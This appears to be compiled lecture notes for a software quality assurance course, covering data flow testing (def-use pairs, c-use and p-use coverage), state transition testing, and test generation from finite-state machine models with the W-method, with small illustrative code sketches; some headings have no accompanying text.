• All these techniques have inherent limitations which prevent them from revealing all faults. Therefore, there is a need to use many different testing techniques and to develop new techniques. This idea is depicted in Figure 5.7. Our goal is to reduce the gap between the total number of faults present in a program and the faults detected by the various test generation techniques.

Figure 5.7 Limitation of different fault detection techniques: the number of faults detected by random testing, control flow–based testing, and data flow–based testing falls short of the total number of faults in a program; new testing techniques are needed to reduce this gap.

5.10 SUMMARY

Flow of data in a program can be visualized by considering the fact that a program unit accepts input data, transforms the input data through a sequence of computations, and, finally, produces the output data. Therefore, one can imagine data values to be flowing from one assignment statement defining a variable to another assignment statement or a predicate where the value is used.

Three fundamental actions associated with a variable are undefine (u), define (d), and reference (r). A variable is implicitly undefined when it is created without being assigned a value. On the other hand, a variable can be explicitly undefined. For example, when an opened file is closed, the variable holding the file pointer becomes undefined. We have explained the idea of "states" of a variable, namely, undefined (U), defined (D), referenced (R), and abnormal (A), by considering the three fundamental actions on a variable. The A state represents the fact that the variable has been accessed in an abnormal manner, causing a data flow anomaly.


Individual actions on a variable do not cause a data flow anomaly. Instead, certain sequences of actions lead to data flow anomaly, and those three sequences of actions are dd, ur, and du. Once a variable enters the abnormal state, it continues to remain in that state irrespective of subsequent actions. The mere presence of a data flow anomaly in a program may not lead to program failure. The programmer must investigate the cause of an anomaly and modify the code to eliminate it. For example, a missing statement in the code might have caused a dd anomaly, in which case the programmer needs to write new code.
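To make the state-based view of a variable concrete, the following is a minimal sketch (illustrative, not from the text) of an anomaly checker that walks a sequence of u, d, and r actions and flags the dd, ur, and du anomalies using the U/D/R/A state model described above.

# Minimal sketch of the variable-state model: states U (undefined),
# D (defined), R (referenced), A (abnormal); actions u, d, r.
TRANSITIONS = {
    ('U', 'd'): 'D', ('U', 'r'): 'A',  # ur anomaly: referenced while undefined
    ('U', 'u'): 'U',
    ('D', 'd'): 'A',                   # dd anomaly: defined twice without a use
    ('D', 'r'): 'R', ('D', 'u'): 'A',  # du anomaly: defined and then undefined
    ('R', 'd'): 'D', ('R', 'r'): 'R', ('R', 'u'): 'U',
}

def final_state(actions, state='U'):
    """Apply a sequence of actions; the A state is absorbing."""
    for a in actions:
        if state == 'A':
            break                      # once abnormal, always abnormal
        state = TRANSITIONS[(state, a)]
    return state

assert final_state('drr') == 'R'   # no anomaly
assert final_state('drdd') == 'A'  # the trailing dd causes an anomaly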

The program path is a fundamental concept in testing. One test case can be generated from one executable path. The number of different paths selected for execution is a measure of the extent of testing performed. Path selection based on statement coverage and branch coverage leads to a small number of paths being chosen for execution. Therefore, there exists a large gap between control flow testing and exhaustive testing. The concept of data flow testing gives us a way to bridge the gap between control flow testing and exhaustive testing.

The concept of data flow testing gives us new selection criteria for choosing more program paths to test than what we can choose by using the idea of control flow testing. Specifically, the data flow test selection criteria are all-du-paths, all-defs, all-c-uses, all-p-uses, all-uses, all-c-uses/some-p-uses, and all-p-uses/some-c-uses. To compare two selection criteria, the concept of a strictly includes relationship is found to be useful.


Definition and use coverages – C-use, P-use, Def-clear, Def-use

We will now examine some test adequacy criteria based on the flow of "data" in a program. This is in contrast to the criteria based on "flow of control" that we have examined so far. Test adequacy criteria based on the flow of data are useful in improving tests that are adequate with respect to control flow–based criteria. Let us look at an example.

Verify that the following test set covers all def-use pairs of z and reveals the error.


Definitions and uses

A parameter x passed as call-by-value to a function is considered a use of, or a reference to, x. A parameter x passed as call-by-reference serves as both a definition and a use of x.

Definitions and uses: Pointers


Definitions and uses: Arrays

C-use and p-use

c-use


p-use


C-uses within a basic block

Data flow graph

A data-flow graph of a program, also known as a def-use graph, captures the flow of definitions (also known as defs) across basic blocks in a program. It is similar to a control flow graph of a program in that the nodes, edges, and all paths through the control flow graph are preserved in the data flow graph. An example follows.

Example

Given a program, find its basic blocks and compute the defs, c-uses, and p-uses in each block. Each block becomes a node in the def-use graph (this is similar to the control flow graph). Attach the defs, c-uses, and p-uses to each node in the graph. Label each edge with the condition which, when true, causes the edge to be taken. We use di(x) to refer to the definition of variable x at node i. Similarly, ui(x) refers to the use of variable x at node i.
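As a concrete illustration, here is a small sketch (the node contents are invented for illustration, not taken from the text's example) of how a def-use graph can be represented, with defs, c-uses, and p-uses attached to each node and conditions labeling the edges.

from dataclasses import dataclass, field

@dataclass
class Node:
    defs: set = field(default_factory=set)    # variables defined in the block
    c_uses: set = field(default_factory=set)  # computation uses in the block
    p_uses: set = field(default_factory=set)  # predicate uses in the block

# A tiny hypothetical def-use graph: node 1 defines x and y, node 2
# branches on x (p-use), node 3 computes with y (c-use) and redefines y.
nodes = {
    1: Node(defs={'x', 'y'}),
    2: Node(p_uses={'x'}),
    3: Node(c_uses={'y'}, defs={'y'}),
    4: Node(c_uses={'x', 'y'}),
}

# Each edge is labeled with the condition that causes it to be taken.
edges = {(1, 2): 'True', (2, 3): 'x > 0', (2, 4): 'x <= 0', (3, 4): 'True'}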


Def-clear paths


def-use pairs

A def of a variable at line l1 and its use at line l2 constitute a def-use pair; l1 and l2 can be the same. dcu(di(x)) denotes the set of all nodes where di(x) is live and used. dpu(di(x)) denotes the set of all edges (k, l) such that there is a def-clear path from node i to edge (k, l) and x is used at node k. We say that a def-use pair (di(x), uj(x)) is covered when a def-clear path from node i to node j is executed. If uj(x) is a p-use, then all edges of the kind (j, k) must also be taken during some executions.

Def-use pairs are items to be covered during testing. However, in some cases, coverage of a def-use pair implies coverage of another def-use pair. Analysis of the data flow graph can reveal a minimal set of def-use pairs whose coverage implies coverage of all def-use pairs.
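The notion of a def-clear path lends itself to a simple check over an executed path. Below is a hedged sketch (reusing the hypothetical nodes from the sketch above; all names are illustrative) that decides whether an executed path covers a def-use pair (di(x), uj(x)): the path must reach node i and later node j with no intervening redefinition of x.

def covers_du_pair(path, var, i, j, nodes):
    """True if `path` covers the def-use pair (d_i(var), u_j(var)): it
    visits node i, later visits node j, and no node strictly between
    them redefines `var` (i.e., the subpath is def-clear)."""
    try:
        start = path.index(i)
        end = path.index(j, start + 1)
    except ValueError:
        return False  # the path does not visit i and then j
    return all(var not in nodes[n].defs for n in path[start + 1:end])

# Path 1 -> 2 -> 4 covers (d1(x), u4(x)).
assert covers_du_pair([1, 2, 4], 'x', 1, 4, nodes)
# Path 1 -> 2 -> 3 -> 4 does not cover (d1(y), u4(y)): node 3 redefines y.
assert not covers_du_pair([1, 2, 3, 4], 'y', 1, 4, nodes)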

Data flow based adequacy


C-use coverage

C-use coverage: path traversed

p-use coverage

Page 401: CP 7026 - Software Quality Assurance

p-use coverage: paths traversed

All-uses coverage

Infeasible p- and c-uses

Page 402: CP 7026 - Software Quality Assurance

Coverage of a c- or a p-use requires a path to be traversed through the program. However, if this path is infeasible, then some c- and p-uses that require this path to be traversed might also be infeasible. Infeasible uses are often difficult to determine without some hint from a test tool.

Infeasible c-use: Example

C-use coverage: It is the fraction of the total number of c-uses that have been covered by the test cases. A c-use is defined as a path through a program from each point where the value of a variable is defined to its computation use, without the variable being modified along the path.

P-use coverage: It is the fraction of the total number of p-uses that have been covered by the test cases. A p-use is a path from each point where the value of a variable is defined to its use in a predicate or decision, without modifications to the variable along the path. Each coverage criterion discussed above captures some important aspect of a program's structure. In general, test coverage is a measure of how well a test covers all the potential fault sites in a software product under test, where a potential fault site is defined very broadly to mean any structurally or functionally described program element whose integrity may require verification and validation via an appropriately designed test. Thus a potential fault site could be a statement, a branch, a c-use, etc.
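As a worked illustration of these two fractions (the counts are assumed for the example, not taken from the text):

def coverage(covered, total):
    """Fraction of coverage items exercised by the test cases."""
    return covered / total if total else 1.0

# A hypothetical unit with 8 c-uses and 5 p-uses, of which the test
# suite exercises 6 and 4, respectively.
print(f"c-use coverage: {coverage(6, 8):.0%}")  # 75%
print(f"p-use coverage: {coverage(4, 5):.0%}")  # 80%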

Page 403: CP 7026 - Software Quality Assurance

Finite state machines

State transition testing

• State transition testing is used where some aspect of the system can be described in what is called a ‘finite state machine’. This simply means that the system can be in a (finite) number of different states, and the transitions from one state to another are determined by the rules of the ‘machine’. This is the model on which the system and the tests are based.

• Any system where you get a different output for the same input, depending on what has happened before, is a finite state system.

• A finite state system is often shown as a state diagram (see Figure 4.2).

• One of the advantages of the state transition technique is that the model can be as detailed or as abstract as you need it to be. Where a part of the system is more important (that is, requires more testing), a greater depth of detail can be modeled. Where the system is less important (requires less testing), the model can use a single state to signify what would otherwise be a series of different states.

• A state transition model has four basic parts:
  • The states that the software may occupy (open/closed or funded/insufficient funds);
  • The transitions from one state to another (not all transitions are allowed);
  • The events that cause a transition (closing a file or withdrawing money);
  • The actions that result from a transition (an error message or being given your cash).

Hence we can see that in any given state, one event can cause only one action, but that the same event – from a different state – may cause a different action and a different end state.

For example, if you request to withdraw $100 from a bank ATM, you may be given cash. Later you may make exactly the same request but it may refuse to give you the money because of your insufficient balance. This later refusal is because the state of your bank account has changed from having sufficient funds to cover the withdrawal to having insufficient funds. The transaction that caused your account to change its state was probably the earlier withdrawal. A state diagram can represent a model from the point of view of the system, the account or the customer.

Let us consider another example of a word processor. If a document is open, you are able to close it. If no document is open, then ‘Close’ is not available. After you choose ‘Close’ once, you cannot choose it again for the same document unless you open that document. A document thus has two states: open and closed.


We will look first at test cases that execute valid state transitions. Figure 4.2 below shows an example of entering a Personal Identity Number (PIN) for a bank account. The states are shown as circles, the transitions as lines with arrows, and the events as the text near the transitions. (We have not shown the actions explicitly on this diagram, but they would be a message to the customer saying things such as 'Please enter your PIN'.)

The state diagram shows seven states but only four possible events (Card inserted, Enter PIN, PIN OK and PIN not OK). We have not specified all of the possible transitions here – there would also be a time-out from ‘wait for PIN’ and from the three tries which would go back to the start state after the time had elapsed and would probably eject the card. There would also be a transition from the ‘eat card’ state back to the start state. We have not specified all the possible events either – there would be a ‘cancel’ option from ‘wait for PIN’ and from the three tries, which would also go back to the start state and eject the card.

In deriving test cases, we may start with a typical scenario.

• First test case here would be the normal situation, where the correct PIN is entered the first time.

• A second test (to visit every state) would be to enter an incorrect PIN each time, so that the system eats the card.

• A third test could enter an incorrect PIN the first time and the correct PIN the second time; another test could have the PIN correct only on the third try. These tests are probably less important than the first two.

• Note that a transition does not need to change to a different state (although all of the transitions shown above do go to a different state). So there could be a transition from ‘access account’ which just goes back to ‘access account’ for an action such as ‘request balance’.

Test conditions can be derived from the state graph in various ways. Each state can be noted as a test condition, as can each transition. However, this state diagram, even though it is incomplete, still gives us information on which to design some useful tests and to explain the state transition technique.

We need to be able to identify the coverage of a set of tests in terms of transitions. We can also consider transition pairs, triples, and so on. Coverage of all individual transitions is also known as 0-switch coverage, coverage of transition pairs is 1-switch coverage, coverage of transition triples is 2-switch coverage, etc. Deriving test cases from the state transition model is a black-box approach, whereas measuring how much we have tested (covered) takes a white-box perspective; nevertheless, state transition testing is regarded as a black-box technique.
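A small sketch of what 0-switch and 1-switch coverage items look like (the transition list is invented for illustration):

from itertools import product

# Transitions as (from_state, event, to_state) for a toy document model.
transitions = [
    ('closed', 'open', 'open'),
    ('open', 'close', 'closed'),
    ('open', 'save', 'open'),
]

# 0-switch coverage items are the individual transitions themselves.
zero_switch = transitions

# 1-switch coverage items are pairs of consecutive transitions: t2 must
# start in the state in which t1 ends.
one_switch = [(t1, t2) for t1, t2 in product(transitions, repeat=2)
              if t1[2] == t2[0]]

print(len(zero_switch), '0-switch items;', len(one_switch), '1-switch items')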

Often the model is translated to or interpreted as a finite state automaton or a state transition system. This automaton represents the possible configurations of the system under test. To find test cases, the automaton is searched for executable paths. A possible execution path can serve as a test case. This method works if the model is deterministic or can be transformed into a deterministic one. Valuable off-nominal test cases may be obtained by leveraging unspecified transitions in these models.

Depending on the complexity of the system under test and the corresponding model the number of paths can be very large, because of the huge amount of possible configurations of the system. To find test cases that can cover an appropriate, but finite, number of paths, test criteria are needed to guide the selection. This technique was first proposed by Offutt and Abdurazik in the paper that started model-based testing. Multiple techniques for test case generation have been developed and are surveyed by Rushby. Test criteria are described in terms of general graphs in the testing textbook.


Test Generation from FSM Models

10.1 STATE-ORIENTED MODEL

Software systems can be broadly classified into two groups, namely, stateless and state-oriented systems. The actions of a stateless system do not depend on the previous inputs to the system. A compiler is an example of a stateless system because the result of compiling a program does not depend on the programs that had been previously compiled. In a state-oriented system, the response of the system to the present input depends on the past inputs to the system. A state-oriented system memorizes the sequence of inputs it has received so far in the form of a state. A telephone switching system is an example of a state-oriented system. The interpretation of digits by a telephone switch depends on the previous inputs, such as a phone going off the hook, the sequence of digits dialed, and the other keys pressed.

A state-oriented system can be viewed as having a control portion and a data portion. The control portion specifies the sequences of interactions with the environment, and the data portion specifies the data to be processed and saved. Depending on its characteristics, a system can be predominantly data oriented, predominantly control oriented, or a balanced mix of both data and control, as illustrated in Figure 10.1.

In a data dominating system, the system spends most of its time processing user requests, and the interaction sequences with the user are very simple. Therefore, the control portion is simple compared to the data processing, which is more complex. This situation is depicted in Figure 10.2.


Figure 10.1 Spectrum of software systems: software systems divide into stateless systems and state-oriented (reactive) systems; the latter range from data-dominated systems through partly data dominated and partly control dominated systems to control-dominated systems.

Figure 10.2 Data-dominated systems: user interactions drive a small control portion and a large data portion.

Example. A web browsing application is an example of a data dominating system. The system spends a significant amount of time in accessing remote data by making HTTP requests and formatting the data for display. The system responds to each command input from the user, and there is not much state information that the system must remember. One need for state information is to perform the Back operation. Moreover, web browsing is not a time-dependent application, except for its dependence on the underlying Transmission Control Protocol/Internet Protocol (TCP/IP) operations.

In a control dominating system, the system performs complex (i.e., many time-dependent and long-sequence) interactions with its user, while the amount of data being processed is relatively small. Therefore, the control portion is large, whereas the data processing functionality is very small. This situation is depicted in Figure 10.3.

Example. A telephone switching system is an example of a control dominating system. The amount of user data processed is rather minimal. The data involved are a mapping of phone numbers to equipment details, off- and on-hook events generated by a user, the phone number dialed, and possibly some other events represented by the push of other keys on a telephone.

Figure 10.3 Control-dominated systems: user interactions drive a large control portion and a small data portion.

The control portion of a software system, that is, the interactions between the system and its user or environment (Figures 10.2 and 10.3), can often be modeled as a finite-state machine (FSM).

We have modeled the interactions of a user with a dual-boot laptop computer (Figure 10.4). Initially, the laptop is in the OFF state. When a user presses the power ON button, the system moves to the BOOT state, where it receives one of two inputs, LINUX and WINDOWS. If the user input is LINUX, then the system boots with the Linux operating system and moves to the LINUX state, whereas the WINDOWS input causes the system to boot with the Windows operating system and move to the WIN state. Whether the laptop is running Linux or Windows, the user can put the machine in a standby state. The standby state for the Linux mode is LSTND, and for the Windows mode it is WSTND. The computer can be brought back to its operating state LINUX or WIN from a standby state LSTND or WSTND, respectively, with a WAKEUP input. The laptop can be moved between the LINUX and WIN states using RESTART inputs. The laptop can be shut down using the SHUTDOWN input while it is in the LINUX or WIN state. The laptop can also be brought to the OFF state by using the power button, but we have not shown these transitions in Figure 10.4.

Figure 10.4 FSM model of a dual-boot laptop computer: states OFF, BOOT, LINUX, WIN, LSTND, and WSTND, with transitions labeled ON/msg0, LINUX/msg1, WINDOWS/msg3, RESTART/msg2, RESTART/msg4, STANDBY/msg5, STANDBY/msg6, WAKEUP/msg7, WAKEUP/msg8, SHUTDOWN/msg9, and SHUTDOWN/msg10.
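The laptop model translates directly into a transition table, as in the sketch below. The state and input names come from the text; the pairing of some msg outputs with particular directions (e.g., which RESTART produces msg2 and which produces msg4) is an assumption, since it cannot be read unambiguously off the figure.

# Transition table for the dual-boot laptop FSM of Figure 10.4:
# (state, input) -> (output, next state).
LAPTOP_FSM = {
    ('OFF',   'ON'):       ('msg0',  'BOOT'),
    ('BOOT',  'LINUX'):    ('msg1',  'LINUX'),
    ('BOOT',  'WINDOWS'):  ('msg3',  'WIN'),
    ('LINUX', 'RESTART'):  ('msg2',  'WIN'),    # assumed pairing
    ('WIN',   'RESTART'):  ('msg4',  'LINUX'),  # assumed pairing
    ('LINUX', 'STANDBY'):  ('msg5',  'LSTND'),
    ('WIN',   'STANDBY'):  ('msg6',  'WSTND'),
    ('LSTND', 'WAKEUP'):   ('msg7',  'LINUX'),
    ('WSTND', 'WAKEUP'):   ('msg8',  'WIN'),
    ('LINUX', 'SHUTDOWN'): ('msg9',  'OFF'),
    ('WIN',   'SHUTDOWN'): ('msg10', 'OFF'),
}

def run(fsm, state, inputs):
    """Feed an input sequence to the FSM; return outputs and final state."""
    outputs = []
    for i in inputs:
        out, state = fsm[(state, i)]
        outputs.append(out)
    return outputs, state

print(run(LAPTOP_FSM, 'OFF', ['ON', 'LINUX', 'STANDBY', 'WAKEUP']))
# (['msg0', 'msg1', 'msg5', 'msg7'], 'LINUX')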

The reader may note that for the purpose of generating test cases we do not consider the internal behavior of a system; instead we assume that the external behavior of the system has been modeled as an FSM. To be more precise, the interactions of a system with its environment are modeled as an FSM, as illustrated in Figure 10.5.

Now we can make a correspondence between Figures 10.5 and 10.4. The software system block in Figure 10.5 can be viewed as the boot software running on a laptop, and the environment block in Figure 10.5 can be viewed as a user. The FSM shown in Figure 10.4 models the interactions shown by the bidirectional arrows in Figure 10.5.

An FSM model of the external behavior of a system describes the sequences of input to and expected output from the system. Such a model is a prime source of test cases. In this chapter, we explain how to derive test cases from an FSM model.

Figure 10.5 Interactions between a system and its environment modeled as an FSM.


10.2 POINTS OF CONTROL AND OBSERVATION

A point of control and observation (PCO) is a well-designated point of interaction between a system and its users. We use the term users in a broad sense to include all entities, including human users and other software and hardware systems, lying outside but interacting with the system under consideration. PCOs have the following characteristics:

• A PCO represents a point where a system receives input from its users and/or produces output for the users.

• There may be multiple PCOs between a system and its users.

• Even if a system under test (SUT) is a software system, for a human user a PCO may be "nearer" to the user than to the software under test. For example, a user may interact with a system via a push button, a touch screen, and so on. We want to emphasize that even if we have a software SUT, we may not have a keyboard and a monitor for interacting with the system.

• In case a PCO is a physical entity, such as a push button, a keyboard, or a speaker, there is a need to find its computer representation so that test cases can be executed automatically.

Example. Assume that we have a software system controlling a telephone switch (PBX) to provide connections between users. The SUT and the users interact via the different subsystems of a telephone. We show the user-interface details of a basic telephone to explain the concept of a PCO (Figure 10.6) and summarize those details in Table 10.1.

Figure 10.6 PCOs on a telephone: the hook (PCO for on- and off-hook inputs), the keypad (PCO for dialing), the mouthpiece (PCO for voice input), the speaker (PCO for tone and voice output), and the ring indicator (PCO for phone ringing), with a line to an exchange.


TABLE 10.1 PCOs for Testing Telephone PBX

PCO | In/Out View of System | Description
Hook | In | The system receives off-hook and on-hook events.
Keypad | In | The caller dials a number and provides other control input.
Ring indicator | Out | The callee receives ring indication.
Speaker | Out | The caller receives tones (dial, fast busy, slow busy, etc.) and voice.
Mouthpiece | In | The caller produces voice input.

Figure 10.7 FSM model of a PBX: a local phone (LP) and a remote phone (RP), each with a full keypad, connected through the PBX.

The reader may notice that even for a simple device such as a telephone we have five distinct PCOs via which a user interacts with the switching software. In real life, users interact with the switching software via these distinct PCOs, and automated test execution systems must recognize those distinct PCOs. However, to make our discussion of test case generation from FSM models simple, clear, and concise, we use fewer PCOs. We designate all the PCOs on a local phone by LP and all the PCOs on a remote phone by RP (Figure 10.7).

10.3 FINITE-STATE MACHINE

An FSM M is defined as a tuple M = <S, I, O, s0, δ, λ>, where

S is a set of states,

I is a set of inputs,

O is a set of outputs,


s0 is the initial state,

δ : S × I → S is a next-state function, and

λ : S × I → O is an output function.
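The tuple definition maps directly onto code. The following is a minimal sketch (illustrative, not the book's notation) of a Mealy-style FSM in which δ and λ are encoded as dictionaries:

class MealyFSM:
    """M = <S, I, O, s0, delta, lam>: delta maps (state, input) to the
    next state, and lam maps (state, input) to the output."""
    def __init__(self, s0, delta, lam):
        self.s0, self.delta, self.lam = s0, delta, lam

    def run(self, inputs):
        """Return the output sequence produced for an input sequence."""
        state, outputs = self.s0, []
        for i in inputs:
            outputs.append(self.lam[(state, i)])
            state = self.delta[(state, i)]
        return outputs

# A two-state toggle machine as a tiny example.
delta = {('s0', 'a'): 's1', ('s1', 'a'): 's0'}
lam = {('s0', 'a'): '0', ('s1', 'a'): '1'}
print(MealyFSM('s0', delta, lam).run('aaa'))  # ['0', '1', '0']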

Note the following points related to inputs and outputs because of the importance of the concept of observation in testing a system:

• Identify the inputs and the outputs which are observed by explicitly specifying a set of PCOs. For each state transition, specify the PCO at which the input occurs and the output is observed.

• There may be many outputs occurring at different PCOs for a single input in a state.

An FSM specification of the interactions between a user and a PBX system is shown in Figure 10.8. The FSM has nine distinct states, as explained in Table 10.2.

Figure 10.8 FSM model of the PBX: the states OH, AD, SB, FB, RNG, TK, LON, RON, and IAF are connected by transitions labeled with input/output pairs such as LP: OFH/LP: DT, LP: #1/{LP: RT, RP: RING}, LP: #2/LP: SBT, RP: OFH/{LP: IT, RP: IT}, and LP: ONH/—.


TABLE 10.2 Set of States in FSM of Figure 10.8

Abbreviation | Expanded Form | Meaning
OH | On hook | A phone is on hook.
AD | Add digit | The user is dialing a number.
SB | Slow busy | The system has produced a slow busy tone.
FB | Fast busy | The system has produced a fast busy tone.
RNG | Ring | The remote phone is ringing.
TK | Talk | A connection is established.
LON | Local on hook | The local phone is on hook.
RON | Remote on hook | The remote phone is on hook.
IAF | Idle after fast busy | The local phone is idle after a fast busy.

TABLE 10.3 Input and Output Sets in FSM of Figure 10.8

Inputs: OFH (off hook), ONH (on hook), #1 (valid phone number), #2 (invalid phone number), NOI (no input).

Outputs: DT (dial tone), RING (phone ringing), RT (ring tone), SBT (slow busy tone), FBT (fast busy tone), IT (idle tone), — (don't care).

The initial state of the FSM is OH, which appears twice in Figure 10.8 because we wanted to avoid drawing transition lines from states LON, RON, and IAF back to the first occurrence of OH at the top.

There are five distinct input symbols (Table 10.3) accepted by the FSM. NOI represents user inaction; that is, the user never provides an input in a certain state. We have introduced the concept of an explicit NOI because we want to describe the behavior of a system without introducing internal events, such as timeouts. There are seven output symbols, one of which denotes a don't care output. A don't care output is an absence of output or an arbitrary output which is ignored by the user.

There are two abstract PCOs used in the FSM of Figure 10.8. These are called LP and RP to represent a local phone used by the caller and a remote phone used by the callee, respectively. We call LP and RP abstract PCOs because each of LP and RP represents five real, distinct PCOs, as explained in Section 10.2.

The input and output parts of a state transition are represented as follows:

PCOi: a / PCOj: b

where input a occurs at PCOi and output b occurs at PCOj. If a state transition produces multiple outputs, we use the notation

PCOi: a / {PCOj: b, PCOk: c}

where input a occurs at PCOi, output b occurs at PCOj, and output c occurs at PCOk. We represent a complete transition using the following syntax:

<present state, input, output, next state> or <present state, input/output, next state>

The state transition <OH, LP: OFH, LP: DT, AD> means that if the FSM is in state OH and receives input OFH (off hook) at port (PCO) LP, it produces output DT (dial tone) at the same port LP and moves to state AD (Figure 10.8).

10.4 TEST GENERATION FROM AN FSM

Given an FSM model M of the requirements of a system and an implementation IM of M, the immediate testing task is to confirm that the implementation IM behaves as prescribed by M. The testing process that verifies that an implementation conforms to its specification is called conformance testing. The basic idea in conformance testing is summarized as follows:

• Obtain sequences of state transitions from M .

• Turn each sequence of a state transition into a test sequence.

• Test IM with a set of test sequences and observe whether or not IM possesses the corresponding sequences of state transitions.

• The conformance of IM with M can be verified by carefully choosing enough state transition sequences from M.

In the following sections, we first explain the ways to turn a state transition sequence into a test sequence. Next, we explain the process of selecting different state transition sequences.


10.6 TESTING WITH STATE VERIFICATION

There are two functions associated with a state transition, namely, an output function (λ) and a next-state function (δ). Test cases generated using the transition tour method discussed in Section 10.5 focus on the outputs. Now we discuss a method for generating test cases by putting emphasis on both the output and the next state of every state transition of an FSM. It is easy to verify outputs since they appear at PCOs, which are external to a system under test. However, verification of the next state of a state transition is not an easy task because the concept of state is purely internal to an SUT. The next state of a state transition is verified by applying further inputs to an SUT and observing its response at the PCOs. A conceptual model of a method to generate test cases from an FSM with both output and state verification is illustrated in Figure 10.11. The five steps of the method are explained in the following, from the standpoint of testing a state transition from state si to sj with input a.

Figure 10.11 Conceptual model of a test case with state verification: from the initial state s0, a transfer sequence moves the FSM to state si; the state transition under test (a/b) moves it to sj; a state verification sequence moves it to sk; and a reset sequence returns it to s0.

Methodology for Testing with State Verification

Step 1: Assuming that the FSM is in its initial state, move the FSM from the initial state s0 to state si by applying a sequence of inputs called a transfer sequence, denoted by T(si). It may be noted that different states will have different transfer sequences, that is, T(si) ≠ T(sj) for i ≠ j. For state si, T(si) can be obtained from the FSM. At the end of this step, the FSM is in state si.

Step 2: In this step we apply input a to the SUT and observe its actual output, which is compared with the expected output b of the FSM. At the end of this step, a correctly implemented state transition takes the SUT to its new state sj. However, a faulty implementation can potentially take it to a state different from sj. The new state of the SUT is verified in the following step.

Step 3: Apply a verification sequence VERj to the SUT and observe the corresponding output sequence. An important property of VERj is that λ(sj, VERj) ≠ λ(s′, VERj) for all s′ ≠ sj. At the end of this step, the SUT is in state sk.

Step 4: Move the SUT back to the initial state s0 by applying a reset sequence RI. It is assumed that an SUT has correctly implemented a reset mechanism.

Step 5: Repeat steps 1–4 for all state transitions in the given FSM.
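A sketch of how steps 1–4 compose into one input sequence per transition (all names are illustrative; the transfer, verification, and reset sequences are assumed to be given as plain input sequences):

def transition_test(transfer, a, verify, reset):
    """Compose the input sequence T(si) @ a @ VERj @ RI for testing one
    transition (si, sj, a/b), following steps 1-4 above."""
    return list(transfer) + [a] + list(verify) + list(reset)

def all_transition_tests(fsm, transfer_seqs, verify_seqs, reset):
    """One test input sequence per transition; `fsm` maps (state, input)
    to (output, next state), as in the earlier sketches."""
    return [transition_test(transfer_seqs[si], a, verify_seqs[sj], reset)
            for (si, a), (out, sj) in fsm.items()]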


For a selected transition from state si to state sj with input a, the above four steps induce a transition tour defined by the input sequence T(si)@a@VERj@RI applied to the system in its initial state s0. The symbol '@' represents concatenation of two sequences. Applying the test design principles discussed in Section 10.5, one can derive a test case from such transition tours. Identifying a transfer sequence T(si) out of the input sequence T(si)@a@VERj@RI for state si is a straightforward task. However, it is not trivial to verify the next state of an implementation. There are three kinds of commonly used input sequences to verify the next state of an SUT. These input sequences are as follows:

• Unique input–output sequence

• Distinguishing sequence

• Characterizing sequence

In the following sections, we explain the meanings of the three kinds of input sequences and the ways to generate those kinds of sequences.


10.9 CHARACTERIZING SEQUENCE

For FSMs which do not possess a distinguishing sequence (DS), it is still possible to determine the state of an FSM uniquely. The FSM shown in Figure 10.17 does not have a DS because there is no singleton state block in the DS tree, as shown in Figure 10.18. The W-method was introduced for FSMs that do not possess a DS [9, 10]. A characterizing set of a state si is a set of input sequences such that, when each sequence is applied to the implementation at state si, the set of output sequences generated by the implementation uniquely identifies state si. Each sequence of the characterizing set of state si distinguishes si from a group of states. Therefore, applying all of the sequences in the characterizing set distinguishes state si from all other states. For an FSM-based specification, a set that consists of characterizing sets of every state is called the W-set = {W1, W2, . . . , Wp} of the FSM. The members of the W-set are called characterizing sequences of the given FSM.
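The core check behind the W-method can be sketched as follows (a toy machine, not the FSM of Figure 10.17): a candidate W-set distinguishes every pair of states if, for each pair, at least one sequence in the set yields different output sequences.

def output_seq(delta, lam, state, inputs):
    """Output sequence produced when `inputs` is applied in `state`."""
    outs = []
    for i in inputs:
        outs.append(lam[(state, i)])
        state = delta[(state, i)]
    return ''.join(outs)

def is_w_set(delta, lam, states, w_set):
    """True if every pair of distinct states is separated by at least
    one sequence in w_set."""
    return all(any(output_seq(delta, lam, s, w) != output_seq(delta, lam, t, w)
                   for w in w_set)
               for s in states for t in states if s != t)

# Toy two-state machine: the single-input sequence 'a' already
# separates the two states by its output.
delta = {('s0', 'a'): 's1', ('s1', 'a'): 's0'}
lam = {('s0', 'a'): 'x', ('s1', 'a'): 'y'}
print(is_w_set(delta, lam, ['s0', 's1'], ['a']))  # True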

The basic test procedure for testing a state transition (si, sj, a/b) using the W-method follows.

Figure 10.17 FSM that does not possess a distinguishing sequence: states A, B, C, and D, with A as the initial state and transitions labeled a/x, a/y, and b/y. (From ref. 11. © 1994 IEEE.)


Figure 10.18 DS tree for the FSM of Figure 10.17: starting from the state block (ABCD) and branching on inputs a and b, every path leads to partitions that still contain a non-singleton block (for example, (AA)(BC), (AA)(CB), (CC)(AA), (BB)(DA), and (DD)(CA)), so the FSM possesses no distinguishing sequence.

Testing Transition (si, sj, a/b) Using W-Method. Repeat the following steps for each input sequence of the W-set:

Step 1: Assuming that the SUT is in its initial state, bring the SUT from its initial state s0 to state si by applying a transfer sequence T(si), as shown in Figure 10.11.

Step 2: Apply the input a and verify that the SUT generates the output b.

Step 3: Apply a verification sequence from the W-set to the SUT and verify that the corresponding output sequence is as expected. Assume that the SUT is in state sk at the end of this step.

Step 4: Move the SUT back to the initial state s0 by applying a reset sequence RI in state sk.

Example: Characterizing Sequences. Consider the FSM specification M = <S, I, O, A, δ, λ> shown in Figure 10.17, where S = {A, B, C, D} is the set of states, I = {a, b} is the set of inputs, O = {x, y} is the set of outputs, A is the initial state, δ : S × I → S is the next-state function, and λ : S × I → O is the output function. Kohavi [9] used multiple experiments to construct the W-set for this FSM. Consider the input sequence W1 = aba. The output sequences generated by W1 for each state of the FSM are shown in Table 10.10. The output sequence generated by the input sequence W1 can identify whether the state of an SUT was B or C before W1 is applied. This is because state B leads to the output sequence yyy, whereas state C leads to the output sequence yyx. However, W1 cannot identify the state of an SUT if the FSM is in A or D because the output sequences are xyx for both states, as shown in Table 10.10.

TABLE 10.10 Output Sequences Generated by FSM of Figure 10.17 as Response to W1

Starting State | Output Generated by W1 = aba
A | xyx
B | yyy
C | yyx
D | xyx

Now let us examine the response of the SUT to the input sequence W2 = ba for each state. The output sequences generated by W2 for each state of the FSM are shown in Table 10.11. The FSM implementation generates distinct output sequences as a response to W2 if an SUT was at A or D. This is because states A and D lead to distinct output sequences yx and yy, respectively.

TABLE 10.11 Output Sequences Generated by FSM of Figure 10.17 as Response to W2

Starting State | Output Generated by W2 = ba
A | yx
B | yx
C | yy
D | yy

